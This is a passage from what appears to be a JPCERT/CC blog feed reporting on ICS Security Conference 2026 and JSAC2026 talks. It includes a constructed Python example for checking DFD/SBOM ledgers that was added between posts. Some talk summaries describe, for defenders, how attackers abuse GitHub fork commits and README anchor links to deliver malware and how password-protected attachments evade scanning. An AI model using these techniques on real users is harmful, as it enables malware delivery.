target="_blank" rel="noopener">Slides</a><br><a href="https://www.youtube.com/watch?v=0lWBEkx8xPY" target="_blank" rel="noopener">YouTube</a><br><br>This talk looked back at the state of control system (ICS) security in 2025 and explained the main trends and changes. It opened by noting that 2025 marked 15 years since the discovery of Stuxnet and 10 years since the Ukraine power outage, and gave an overview of how, as ICS and IT become ever more interconnected, rising geopolitical tension is also affecting cyberspace.</p> <p>Turning to incidents, ransomware attacks remained at a high level this past year, with serious consequences such as production stoppages and shipment delays, particularly in manufacturing. Using the cases of a UK car manufacturer and major Japanese companies, the talk showed the structural risk that even an intrusion into the IT domain can end up seriously affecting OT and production. Cases of state-sponsored and hacktivist attacks on critical infrastructure, and of attacks targeting renewable energy installations, dams and hydroelectric plants, showed that cyber attacks with physical consequences are becoming more real.</p> <p>On vulnerabilities, it reported the growing number of ICS-related advisories published by CISA and the expanding number of ICS/OT devices exposed to the Internet. It also touched on the turmoil over the running of the CVE program and on new vulnerability database initiatives in Europe, signs that the global management of vulnerability information is at a turning point.</p> <p>In addition, while regulation and standards continue to mature, with the EU's NIS2 Directive, the revision of the IEC 62443 series and developments around CIRCIA in the US, it set out how policy progress in each country and institutional instability at CISA in the US government are affecting ICS security. It also drew attention to the challenges accompanying new technologies, such as the rapid progress of AI and the migration to post-quantum cryptography, and raised the importance of preparing for them in long-lived ICS environments.</p> <p>Overall, it concluded that although on the surface 2025 was not a year of frequent large-scale destructive attacks, changes foreshadowing the next era are steadily under way: the broadening reach of ransomware, the security impact of intensifying rivalry between states, the reorganisation of standards and institutions, and the response to new technologies.<br><br><img class="asset asset-image at-xid-4071773" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_01-640wri.png" alt="" width="640" height="360"></p> <h3>Learning from the "Preparedness" Factories Have Always Practised: Incident Response for Control Systems</h3> <p><strong>Speaker:<br>Claroty Ltd.</strong><br><strong>加藤 俊介, APJ Sales/Senior Solution Engineer</strong><br><a href="https://www.jpcert.or.jp/present/2026/ICSSConf2026_02_CLAROTY.pdf" target="_blank" rel="noopener">Slides</a><br><a href="https://www.youtube.com/watch?v=CaFfv8DgbTc" target="_blank" rel="noopener">YouTube</a><br><br>加藤's talk reviewed recent OT security incidents and explained how the "preparedness" mindset that factories have long cultivated can be applied to cyber incident response.</p> <p>About 80% of incidents are "indirect OT stoppages" originating in IT: even when the control layer itself is not damaged, operations stop because the upstream IT systems they depend on go down.</p> <p>Using the TRITON case and others, the talk then showed that inherently safe design, redundancy and fail-safe thinking at the design, implementation and operation stages can also work against cyber attacks. Through the Fukushima Daiichi accident and overseas manufacturing examples, it shared concrete cases in which businesses kept running without digital systems by relying on "physical reality": paper records, the operators' own senses, and manual operation.</p> <p>The Colonial Pipeline and Maersk cases showed the structure in which a business stops because IT functions such as billing and logistics stop even though the control systems are intact, and the talk stressed the importance of designing operations on the assumption of degraded functionality. It also touched on recovery achieved through mutual and public assistance beyond individual companies, suggesting that in a crisis, cooperation that transcends competition is key.</p> <p>Finally, it presented a framework for restart decisions from three perspectives, MVA (minimum viable architecture), MVP (minimum viable process) and MVC (minimum viable control), and raised the importance of sorting out in advance the options of analogue continuation, digital backup recovery and use of external resources. It closed with the message that a deep understanding of OT is what leads to effective incident response capability for control systems.<br><br><img class="asset asset-image at-xid-4071774" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_02-640wri.png" alt="" width="640" height="360"></p> <h3>Security Challenges and Defence Techniques for Digital Twins in the Automotive Industry</h3> <p><strong>Speaker:<br>TXOne Networks Inc.</strong><br><strong>遠山 千鶴, Senior Threat Researcher, Threat Research</strong><br><a href="https://www.jpcert.or.jp/present/2026/ICSSConf2026_03_TXONE_NETWORKS.pdf" target="_blank" rel="noopener">Slides</a><br><a href="https://www.youtube.com/watch?v=pY4ZGAXh9QQ" target="_blank" rel="noopener">YouTube</a><br><br>遠山's talk gave a systematic account of the security challenges of digital twins in the automotive industry, against the background of their expanding use, and of concrete defence techniques. It began by organising the definitions and standards for digital twins, confirming the concept of reproducing real-world products, equipment and processes in a virtual space for simulation, monitoring and optimisation. It then showed that, with the automotive industry in the "once-in-a-century transformation" known as CASE (Connected, Autonomous, Shared, Electric), digital twins play an important role as a foundational technology supporting more advanced development, production and operation.</p> <p>Concrete use cases included Toyota's optimisation of in-plant sensors, Honda's energy management with a view to its V2G/V1G strategy, and Hyundai's smart factory, along with benefits such as quality improvement, cost reduction and flexible production. On the other hand, the talk pointed out that an architecture connecting the physical and virtual bidirectionally expands the attack surface. Assumed attack scenarios such as network reconnaissance, data injection, latency attacks and model tampering were laid out, together with their potential to escalate into high risks such as erroneous control, production stoppages and intellectual property leakage.</p> <p>It further emphasised role-specific defences and their limits, the preparation of incident response playbooks, and the importance of security design across the whole lifecycle (development to operation). The message was that thorough Secure-by-Design, continuous monitoring and layered defence including cooperation with the SOC are key to sustained safety and security for the automotive industry in the digital twin era.<br><br><img class="asset asset-image at-xid-4071780" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_03-640wri.png" alt="" width="640" height="360"></p> <h3>Promoting Integrated Safety and Security Design against Cyber Attacks</h3> <p><strong>Speaker:<br>佐々木 泰斗, Representative Member, Forehacks LLC /</strong><br><strong>Visiting Researcher, Monozukuri DX Research Institute, Nagoya Institute of Technology</strong><br><a href="https://www.jpcert.or.jp/present/2026/ICSSConf2026_04_FOREHACKS.pdf" target="_blank" rel="nofollow noreferrer noopener">Slides</a><br><a href="https://www.youtube.com/watch?v=DEyxUna4q9c" target="_blank" rel="nofollow noreferrer noopener">YouTube</a><br><br>佐々木's talk proposed an approach in which, against the background of more sophisticated cyber attacks and tighter regulation, safety and security in control systems are not treated separately but designed and managed in an integrated way across the whole lifecycle. With the growing number of vulnerabilities and the need to respond to the EU Cyber Resilience Act (CRA), consistent management from development through operation and maintenance is required, and the talk pointed out the limits of conventional siloed organisational structures and disconnected document management.</p> <p>The solution presented was a framework that uses a DFD (Data Flow Diagram) as the common structural model and binds safety requirements, security requirements and the SBOM into the "same ledger". By expressing the DFD as JSON and using node_id and dataflow_id as the index to link design intent, analysis results, test requirements, decision history and SBOM information, a Single Source of Truth (SSOT) is achieved. A MANIFEST file further manages the state and history of the whole project to ensure traceability.</p> <p>In the development case of an autonomous wheelchair, safety analysis (HARA) and security analysis (TARA) were carried out on the same model, showing how countermeasures for sensor failure and for spoofing attacks are designed consistently. At the implementation stage, an audit process was also presented in which generative AI detects "ghost flows" that do not exist in the design and prompts correction based on a differential evaluation against the design JSON. At the operation stage, the talk stressed the importance of linking the SBOM with CVE information, tracking the scope of a vulnerability's impact by ID, and recording the grounds for decisions on risk acceptance and remediation.</p> <p>Throughout, the message was that organising the structure around the DFD and embedding generative AI as the intelligence, so that people can make decisions with evidence, is key to building an integrated design foundation for ensuring safety and security in control systems going forward.<br><br><img class="asset asset-image at-xid-4071783" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_04-640wri.png" alt="" width="640" height="360"></p> <h3>International Developments in Vulnerability Information and CVD Activities, Where Interest Is Growing as European and Other Regulations Take Effect</h3> <p><strong>Speaker:<br>JPCERT Coordination Center</strong><br><strong>伊藤 智貴, Global CVD Project Lead, Global Coordination Division</strong><br><a href="https://www.jpcert.or.jp/present/2026/ICSSConf2026_05_JPCERTCC.pdf" target="_blank" rel="nofollow noreferrer noopener">Slides</a><br><a href="https://www.youtube.com/watch?v=lq4Xdslmkcc" target="_blank" rel="nofollow noreferrer noopener">YouTube</a><br><br>Against the background of advancing European regulation, this talk organised the international trends and challenges in vulnerability handling around CVD (Coordinated Vulnerability Disclosure), CVE and SBOM, and the responses required of stakeholders. Vulnerability information creates new risks such as zero-day exploitation and delayed response unless it is managed properly, not only in terms of technical accuracy but also operationally, covering receipt, coordination and publication. The talk therefore stressed the importance of CVD, in which reporters, vendors, users, coordinators and others work together.</p> <p>On the CVE program, it shared recent developments such as the expansion of CNAs and Roots and the turmoil around NVD, and pointed to the need for data quality, enrichment and proper handling. It also noted that JPCERT/CC supports domestic organisations as a CNA and a Root. On SBOM, as a means of "transparency", it showed that SBOM forms the basis of vulnerability management by identifying components and matching them against CVEs, and described the international challenges under discussion, such as unified identifiers, coverage and differences between tools.</p> <p>It further explained that the EU Cyber Resilience Act (CRA) and the NIS2 Directive require a vulnerability disclosure policy, reporting of actively exploited vulnerabilities within 24 hours, and SBOM readiness, and suggested that companies outside the EU may also be affected. In light of these trends, it called on vendors to establish vulnerability handling structures and disclosure policies, understand their supply chains and consider assigning CVEs, and on users to understand their assets, use SBOMs and adopt prioritisation methods (SSVC, EPSS and the like). It emphasised the importance of jointly building an ecosystem in which vulnerability information circulates and is used in a balanced way, across countries and roles.<br><br></p> <p><strong><img class="asset asset-image at-xid-4071787" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_05-640wri.png" alt="" width="640" height="360"></strong></p> <h3>Panel Session: Challenges in Appropriate Asset Management Methods for Vulnerability Handling ~ Trial Evaluation across Multiple Manufacturing Sectors ~</h3> <p><strong>Speakers &amp; panellists:</strong><br><strong>田中 哲也, Group Manager, IT Governance Department, Digital Transformation Headquarters, NSK Ltd.</strong><br><strong>正木 文統, Senior Manager, Cybersecurity Architecture &amp; Solutions, Digital &amp; IT Division, Santen Pharmaceutical Co., Ltd.</strong><br><strong>越智 直紀, Assistant Manager, Security Development Department, Platform Development Center, R&amp;D Division, Panasonic Automotive Systems Co., Ltd.</strong></p> <p><strong>Speaker &amp; facilitator:</strong><br><strong>JPCERT Coordination Center</strong><br><strong>河野 一之, Senior Analyst, Control System Security, Domestic Coordination Group<br><br></strong>Because the panel session was held for the in-person audience only, there are no plans to stream video or publish slides, and we refrain from covering it in this blog.</p> <p>Control system security staff in manufacturing who are interested in the panel's theme, "appropriate asset management methods for vulnerability handling", are encouraged to consider joining the "ICS Security Practitioners' Community". If you wish to join, please contact the address below (Control System Security, Domestic Coordination Group).</p> <p>Contact:<br>Domestic Coordination Group (Control System Security)<br>Email: <a href="mailto:info-coa@jpcert.or.jp">info-coa@jpcert.or.jp</a></p> <h3>Closing remarks</h3> <p><strong>椎木 孝斉, Director, JPCERT Coordination Center</strong></p> <p>The closing remarks were given by 椎木, Director of JPCERT/CC.</p> <p>He noted that the conference had reached its 18th edition since the first in 2009, and reported that this year it was held in person with archived streaming of some talks, and that JPCERT/CC handled much of the organisation.</p> <p>He also offered the view that, as the term "cybersecurity" has spread, its scope has expanded beyond IT and networks to "the business itself", including the control systems at the core of the business.</p> <p>He called on practitioners facing these challenges amid a changing environment to use the conference and JPCERT/CC's activities as a testing ground, and closed by again expressing thanks to the speakers and all participants.<br><br></p> <p><strong><img class="asset asset-image at-xid-4071790" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_closing-640wri.png" alt="" width="640" height="360"></strong></p> <h3>Closing</h3> <p>At this year's Control System Security Conference, speakers from a range of positions, including control system vendors, a visiting researcher at a university research institute, and user companies, presented on the situation surrounding control system security. We hope the conference will serve as a reference for the future activities of everyone involved with control systems. We will continue to improve the event and to share information and knowledge that contributes to improving control system security in Japan.</p> <p>Thank you for reading this report on the Control System Security Conference 2026.</p> <p>We look forward to seeing you at the next edition.</p> <p style="text-align: right;">織戸 由美, Domestic Coordination Group</p>
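To make the ledger idea from 佐々木's talk concrete, here is an added Python example (not code from the talk or from Forehacks): a DFD expressed as JSON with node_id and dataflow_id as the keys, a referential-integrity check, a "ghost flow" diff of the flows observed in the implementation against the design, and a mapping from a vulnerability feed through the SBOM to the affected nodes and the HARA/TARA items attached to the flows they touch. The JSON schema, the component names and versions, the "EXAMPLE-0001" advisory and the observed flows are all constructed for this example; the MANIFEST file and the generative-AI audit step described in the talk are not modelled.

```python
"""A DFD-as-JSON ledger: integrity check, ghost-flow diff against the
implementation, and SBOM/CVE impact traced to flows by dataflow_id."""
import json

# Constructed design ledger (the schema is an assumption for this example).
DESIGN_JSON = """{
  "nodes": [
    {"node_id": "N1", "name": "LiDAR sensor",      "components": ["lidar-fw"]},
    {"node_id": "N2", "name": "Motion controller", "components": ["ctrl-app", "libparse"]},
    {"node_id": "N3", "name": "Telemetry gateway", "components": ["gw-app", "libparse"]}
  ],
  "dataflows": [
    {"dataflow_id": "F1", "src": "N1", "dst": "N2", "hara": ["H-01"], "tara": ["T-01"]},
    {"dataflow_id": "F2", "src": "N2", "dst": "N3", "hara": [],       "tara": ["T-02"]}
  ]
}"""
# Constructed SBOM (component -> installed version) and a made-up advisory.
SBOM = {"lidar-fw": "1.2.0", "ctrl-app": "3.0.1", "libparse": "2.4.0", "gw-app": "0.9.0"}
CVE_FEED = [{"id": "EXAMPLE-0001", "component": "libparse", "fixed_in": "2.5.0"}]
# Flows recovered from the implementation (e.g. from firewall rules or a capture).
OBSERVED_FLOWS = [("N1", "N2"), ("N2", "N3"), ("N3", "N1")]


def load_design(text=DESIGN_JSON):
    """Parse the ledger and refuse flows that point at unknown node_ids."""
    design = json.loads(text)
    node_ids = {n["node_id"] for n in design["nodes"]}
    for flow in design["dataflows"]:
        if flow["src"] not in node_ids or flow["dst"] not in node_ids:
            raise ValueError(f"{flow['dataflow_id']} references an unknown node")
    return design


def ghost_flows(design, observed):
    """Observed (src, dst) pairs that have no dataflow_id in the design."""
    designed = {(f["src"], f["dst"]) for f in design["dataflows"]}
    return sorted(set(observed) - designed)


def missing_flows(design, observed):
    """Designed flows never seen in the implementation (dead requirements)."""
    seen = set(observed)
    return sorted(f["dataflow_id"] for f in design["dataflows"]
                  if (f["src"], f["dst"]) not in seen)


def _version(s):
    return tuple(int(part) for part in s.split("."))


def affected_nodes(design, sbom, cves):
    """{advisory id: [node_id, ...]} for components installed below fixed_in."""
    hits = {}
    for cve in cves:
        installed = sbom.get(cve["component"])
        if installed is None or _version(installed) >= _version(cve["fixed_in"]):
            continue
        hits[cve["id"]] = [n["node_id"] for n in design["nodes"]
                           if cve["component"] in n["components"]]
    return hits


def impacted_flows(design, node_ids):
    """Flows touching an affected node, with the HARA/TARA items to re-check."""
    return {f["dataflow_id"]: {"hara": f["hara"], "tara": f["tara"]}
            for f in design["dataflows"]
            if f["src"] in node_ids or f["dst"] in node_ids}


if __name__ == "__main__":
    design = load_design()
    print("ghost flows:", ghost_flows(design, OBSERVED_FLOWS))
    print("unexercised designed flows:", missing_flows(design, OBSERVED_FLOWS))
    for adv, nodes in affected_nodes(design, SBOM, CVE_FEED).items():
        print(adv, "affects", nodes, "->", impacted_flows(design, nodes))
```

The pay-off of keying everything by node_id and dataflow_id is visible in the last loop: one advisory resolves to the nodes that carry the component and from there to the exact HARA/TARA entries whose assumptions need re-evaluation, which is the ID-level impact tracking the talk asks for at the operation stage.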
  42. JSAC2026 Event Report: Workshops / Lightning Talk Session / Panel Discussion

    Fri, 06 Mar 2026 02:00:00 -0000

    Continuing our coverage of the JSAC2026 talks, the third instalment covers the Workshops/...
    <p>Continuing our coverage of the JSAC2026 talks, this third instalment covers the Workshops, the Lightning Talk Session and the Panel Discussion.</p> <hr /> <p><strong>[Workshop 1]</strong></p> <h3><strong>Leveraging EML Analyzer to triage malicious email messages during incident response</strong></h3> <h5>Speakers: 二関 学; Michał Praszmo, CERT Polska</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_workshop1_en.pdf">Slides (English)</a> </p> <p>This workshop focused on analysing and triaging malicious e-mail: after organising how e-mail works and the attack techniques used, it introduced practical analysis methods using sample messages.</p> <p>The first half organised the basic e-mail specifications such as the Internet Message Format and MIME, and explained the path a message takes to be delivered and how to read Received headers. It also covered the e-mail authentication technologies SPF, DKIM and DMARC: the role and limitations of each, and what to check in actual message headers.</p> <p>The second half was hands-on analysis with EML Analyzer, an open-source tool that parses EML and MSG format messages and presents header information, body, attachments and URLs in structured, visual form. Participants used EML Analyzer to perform the following analyses and submitted their results in CTF format.</p> <ul> <li>Identify the Message-ID</li> <li>Identify the Subject of the original message referred to in an NDR (Non-Delivery Report)</li> <li>Identify the SHA256 hash of a PDF attached as a request for quotation</li> <li>Identify the source host IP that relayed the message into the Outlook/Microsoft environment</li> <li>Identify the FQDN of the host that ran a ClamAV malware scan</li> <li>Identify the envelope FROM (Return-Path) from a debug header left in place</li> <li>Identify the sending client's IP address from an X-header</li> <li>Identify the attacker-controlled C2 server used in a Roundcube XSS attack</li> <li>Identify the full e-mail address of the original sender from traces of conversation hijacking</li> <li>Analyse the modification that caused DKIM verification to fail and identify the hash of the unmodified body</li> <li>Identify the mechanism by which a received message passed SPF</li> <li>Identify where abuse reports are sent when a message sent from @gmail.com fails DMARC verification</li> </ul> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/01_JSAC2026_Day1_WS1-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4065718" style="display: block;"/></p> <hr /> <p><strong>[Workshop 2]</strong></p> <h3><strong>Advanced Malware Reverse Engineering: Dealing with anti analysis techniques from scratch.</strong></h3> <h5>Speaker: Mark Lim, Palo Alto Networks, Inc.</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_workshop2_en.pdf">Slides (English)</a> </p> <p>This hands-on workshop used malware actually observed in the wild and worked through its internals while defeating anti-analysis techniques. Two malware families were analysed:</p> <ul> <li>Guloader: a dropper characterised by its multi-stage structure</li> <li>Gremlin: an information-stealing infostealer</li> </ul> <p>Assuming a multi-stage attack scenario in which Guloader is the entry point and ultimately deploys and executes Gremlin, the analysis followed the real attack chain.</p> <p>It proceeded in stages, from analysing the VBS file and PowerShell script, through shellcode analysis, to dealing with control-flow obfuscation that uses the Vectored Exception Handler (VEH). In each phase, participants first tackled the target and then received an explanation of the underlying mechanism and analysis method, so that understanding deepened as they went.</p> <p>The tools and scripts used for analysis were also explained concretely, making it a systematic introduction to practical analysis techniques.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/02_JSAC2026_Day1_WS2-640wri.jpg" width="640" height="361" alt="" class="asset asset-image at-xid-4065720" style="display: block;"/></p> <hr /> <p><strong>[Workshop 3]</strong></p> <h3><strong>Re:birth the fidb: Reverse Engineering the .NET AOT Malware</strong></h3> <h5>Speakers: 吉武 暉洋, 木田 明宏, 神 章洋, NFLaboratories, Inc.</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_workshop3_jp.pdf">Slides (Japanese)</a> </p> <p>This workshop targeted malware that uses .NET Native AOT (Ahead-of-Time) compilation, which has begun to be observed in recent years, and aimed to teach its analysis systematically and practically at an introductory level.</p> <p>Conventional .NET malware retains IL code and rich metadata, so analysis with a decompiler such as dnSpy has been relatively easy. Binaries compiled with Native AOT, however, carry no IL code and have most of their metadata stripped, so conventional .NET malware analysis techniques alone are not enough. The workshop explained practical analysis approaches to these Native AOT-specific problems.</p> <p>The first half laid out the differences between conventional .NET (IL-bearing) binaries and Native AOT binaries and explained the internal structure and characteristics of Native AOT programs: at first glance a Native AOT binary looks like a native binary written in C++, and because the standard library is statically linked, the amount of code to analyse becomes enormous.</p> <p>Next, signature-based triage was taken up as a way to cope with this. The hands-on part covered creating and applying signatures in Ghidra and IDA Pro to identify functions originating from the standard library and narrow down the code that actually needs analysis. Using Ghidra's Function ID and IDA Pro's FLIRT signatures was shown to greatly improve readability.</p> <p>The second half, building on the Dehydrate/Rehydrate mechanism applied at Native AOT compile time, introduced techniques for recovering string literals and object metadata that tend to be lost in static analysis. Using a Ghidra plugin, participants practised statically restoring compressed metadata and frozen objects without resorting to dynamic analysis, improving the readability of the results.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/03_JSAC2026_Day2_WS3-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4065721" style="display: block;"/></p> <hr /> <p><strong>[Lightning Talk Session 1]</strong></p> <h3><strong>HoldingHandsRAT Attacks against Japanese company</strong></h3> <h5>Speaker: 竹内 俊輝, NEC Corporation</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_LT_1_toshiki_takeuchi_en.pdf">Slides (English)</a> </p> <p>This talk explained an attack case in which HoldingHandsRAT targeted a Japanese company, based on the attack e-mails actually observed and the malware's behaviour.</p> <p>HoldingHandsRAT is a RAT that has been used in attacks against Taiwan, Japan and Malaysia; the talk presented a case targeting a Japanese company via Japanese-language attack e-mails observed in May 2025. The PDB paths and behaviour found during analysis showed an implementation similar to the publicly available HoldingHands code.</p> <p>As for the specific technique, an e-mail posing as an internal notice such as "Notice of revision to the salary system" carried a ZIP attachment containing a password-protected EXE file and a text file with the password. Protecting the EXE with a password may have been intended to evade detection by security products.</p> <p>The talk also explained that some of the malware used in the attack carried a digital signature apparently stolen from a legitimate company, and that multiple domains with similar strings were registered around the same time, many of them resolving to IP addresses in Japan.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/04_JSAC2026_Day2_LT01-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4065723" style="display: block;"/></p> <hr /> <p><strong>[Lightning Talk Session 2]</strong></p> <h3><strong>The Dangerous Cotenants of Hosting Services</strong></h3> <h5>Speakers: 戸祭 隆行, NTT Security Japan; 冨樫 良介, NTT DOCOMO Business</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_LT_2_takayuki_tomatsuri-ryosuke_togashi_jp.pdf">Slides (Japanese)</a> </p> <p>This talk explained, with concrete examples, the security risks that arise when multiple customers of a rental server or hosting service share a common mail infrastructure.</p> 
<p>Rental servers are easy to use, but in many cases IP addresses and mail-sending infrastructure are shared between customers. The talk pointed out that this shared-infrastructure characteristic does not always sit well with sender authentication technologies such as SPF and DMARC. In particular, because SPF is based on the sending IP address, it may be unable to distinguish spoofed mail sent by another customer sharing the same IP range.</p> <p>It also explained that, when the provider and its customers use the same mail infrastructure, an attacker may be able to send mail impersonating the provider, because the IP addresses permitted in the provider's SPF record end up being usable by malicious customers as well. In such a situation, even properly configured SPF and DMARC may not be able to prevent spoofing.</p> <p>As one way to assess this risk, the talk introduced the approach of comparing the customer's SPF record with the provider's. While it is hard to learn a hosting service's internal structure from outside, cross-checking the SPF records published in DNS makes it possible to see whether the IP addresses a customer may send from are included in the provider's SPF, and so to estimate to some degree whether the spoofing risk applies.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/05_JSAC2026_Day2_LT2-640wri.jpg" width="640" height="302" alt="" class="asset asset-image at-xid-4065724" style="display: block;"/></p> <hr /> <p><strong>[Lightning Talk Session 3]</strong></p> <h3><strong>"Landing" Phishing Sites with TOAMI, IKESU and CHOKA: Efficient Hunting through Linked Browser Extensions</strong></h3> <h5>Speaker: 坪井 祐一, NTT DOCOMO Business</h5> <p>This talk introduced TOAMI (投網, "casting net"), a browser extension developed to support the work of "phishing hunters" engaged in anti-phishing operations, and two further extensions, IKESU (生簀, "fish pen") and CHOKA (釣果, "catch"), that make more efficient use of its detection results.</p> <p>TOAMI is a browser extension that supports phishing hunters investigating suspicious URLs, and has a function that outputs phishing site detections as logs.</p> <p>IKESU visualises the detection logs output by TOAMI in a GUI, offering list views, search and sorting. Its concept is to manage the logs like "fish in a pen", and a highlighted feature is that everything can be done within the browser.</p> <p>CHOKA was proposed as a tool that, from detections selected in IKESU, assists in drafting and sending abuse reports.</p> <p>The background to these tools is the heavy burden of manually investigating phishing sites in detail. Such investigation demands considerable resources and advanced skills, so streamlining and standardising the work is important, and the tools were developed for that purpose. The speaker expressed the hope that linking TOAMI, IKESU and CHOKA will streamline the whole flow from detection through analysis to takedown, and contribute to the rapid takedown of phishing sites.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/06_JSAC2026_Day2_LT03-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4065725" style="display: block;"/></p> <hr /> <p><strong>[Lightning Talk Session 4]</strong></p> <h3><strong>Deceiving Developers: Abusing Legitimate GitHub Repositories to Deliver Malware</strong></h3> <h5>Speaker: Theo Webb, GMO Cybersecurity by Ierae, Inc.</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_LT_4_theo_webb_en.pdf">Slides (English)</a> </p> <p>This talk explained the technique, background and impact of an attack campaign that abuses legitimate GitHub repositories to distribute malware to developers.</p> <p>The attack combines search-engine malvertising with GitHub's repository structure. The attacker forks a legitimate GitHub repository and creates a commit that rewrites the download link in the README. Because this commit can be displayed under a URL beneath the official repository, it can be viewed in the same format as the official repository's own pages.</p> <p>The attacker then serves a link to this commit as an advertisement keyed on GitHub Desktop. When a victim reaches the README via the ad and downloads the installer from the link, the Windows build runs malware including HijackLoader, and the macOS build deploys AMOS Stealer.</p> <p>The factor that makes the attack work is that GitHub can display commits originating from forks under the official repository's URL format. Even after the fork or account is deleted, the commit itself may remain accessible, which makes tracking and fully removing malicious commits difficult. Using anchor links within the README to avoid GitHub's warning banner was also described.</p> <p>At the end, the talk emphasised as countermeasures checking the official repository's default branch, and obtaining installers from the Releases page or the vendor's official download page rather than from links in a README.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/07_JSAC2026_Day2_LT04-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4065726" style="display: block;"/></p> <hr /> <p><strong>[Lightning Talk Session 5]</strong></p> <h3><strong>Unmasking Houken: Advanced TTPs and Detection</strong></h3> <h5>Speaker: Ruth Ng, PricewaterhouseCoopers Hong Kong</h5> <p>This talk discussed the division of labour in modern state-sponsored cyber attacks, focusing mainly on Initial Access Brokers. As much of the content was TLP:RED, we omit the details.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/08_JSAC2026_Day2_LT05-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4065727" style="display: block;"/></p> <hr /> <p><strong>[Lightning Talk Session 6]</strong></p> <h3><strong>Monitoring the Domestic Mobile Line Contracts of Overseas Investment Fraud Groups</strong></h3> <h5>Speaker: yumano</h5> <p>This talk presented the results of a study that focused on the mobile phone numbers abused in overseas investment fraud and similar schemes, and tested the effectiveness of SMS-based identity verification.</p> <p>The speaker described collecting mobile phone numbers actually used in romance scams and investigating their contract status and contract periods.</p> 
<p>Analysing the contract status over roughly ten months before and after the offence date showed a tendency for lines to be contracted just before the offence and cancelled after it ended.</p> <p>This suggests that attackers may be acquiring large numbers of mobile numbers for verification purposes over short periods, and that SMS-based identity verification may therefore not be sufficiently effective as a fraud countermeasure.</p> <p>The talk concluded that checking contract status before registration, and quickly sharing information on phone numbers used in fraud, are important for preventing harm.</p> <hr /> <p><strong>[Panel Discussion]</strong></p> <h3><strong>The 2025 Security Incidents That Caught the Attention of the JSAC2026 Review Board</strong></h3> <h5>Speakers: CFP Review Board</h5> <p><strong>(小池 倫太郎, NTT Security Japan; 小林 稔, Internet Initiative Japan; 中島 将太, Cyber Defense Institute; 中津留 勇, Fujitsu; 丹羽 祐介, ITOCHU Corporation; 原 弘明, Palo Alto Networks, Inc.; Steve Su, Google LLC; 朝長 秀誠, JPCERT/CC)</strong> </p> <p>The panel looked back at the security incidents of 2025 and discussed the cases that the review board members found particularly noteworthy. There was a lively exchange of views with quick-witted banter among the members, but as much of the content was TLP:RED, we omit the details.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/10_JSAC2026_Day2_panel2-640wri.jpg" width="640" height="361" alt="" class="asset asset-image at-xid-4065728" style="display: block;"/></p> <hr /> <h3><strong>Closing</strong></h3> <p>At JSAC2026, awards were given to the sessions that shared especially outstanding information. The Excellent Presentation Award (formerly the Best Speaker Award) goes to the session with the highest proportion of "Excellent" (very satisfied) ratings in the participant survey, and the Special Recognition Award is decided by discussion among the CFP Review Board. The winners were as follows.</p> <p>&lt;<strong>Excellent Presentation Award</strong>&gt;<br />Title: Re:birth the fidb: Reverse Engineering the .NET AOT Malware<br />Speakers: 吉武 暉洋, 木田 明宏, 神 章洋, NFLaboratories, Inc.<br /><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/award-c73ebb2f-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4071686" style="display: block;"/></p> <p>&lt;<strong>Special Recognition Award</strong>&gt;<br />Title: Unmasking the CoGUI Phishing Kit, the Major Chinese Phishing-as-a-Service Targeting Japan<br />Speakers: Shadow Liu, Lime Chen, Albert Song, TeamDonut</p> 
<p>Finally, we would like to take this opportunity to thank everyone who attended JSAC2026 and everyone who read this report.</p> <p style="text-align: right;">矢野 雄紀, Incident Response Group</p>
  43. JSAC2026 Event Report ~DAY 2~

    Fri, 27 Feb 2026 02:00:00 -0000

    Continuing from the previous post, this second installment covers the DAY 2 Main Track talks ...
    <p>Continuing from the <a href="https://blogs.jpcert.or.jp/ja/2026/02/jsac2026day1.html">previous post</a>, this second installment covers the DAY 2 Main Track talks held on the second day.</p> <h3>Following the Trace: Reconstructing Attacks from Ext4 and XFS Journals</h3> <h5>Speaker: Minoru Kobayashi, Internet Initiative Japan Inc.</h5> <p><a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_1_minoru_kobayashi_en.pdf">Slides (English)</a></p> <p>Mr. Kobayashi presented an approach that infers file operations from the journal structures of the ext4 and XFS file systems and reconstructs them as a timeline, and, through a demo of FJTA (Forensic Journal Timeline Analyzer), the journal analysis tool he developed, showed how journal analysis can complement conventional timeline analysis even when timestamps cannot be trusted.</p> <p>He first pointed out a limitation of conventional timeline analysis in digital forensics: MACB timestamps are only a snapshot at the time the disk was acquired, and by their nature cannot reflect a history of multiple operations or tampering by timestomping. He then explained his motivation for turning to the journaling mechanisms of ext4 and XFS, which are widely used on Linux, as a new approach to that problem.</p> 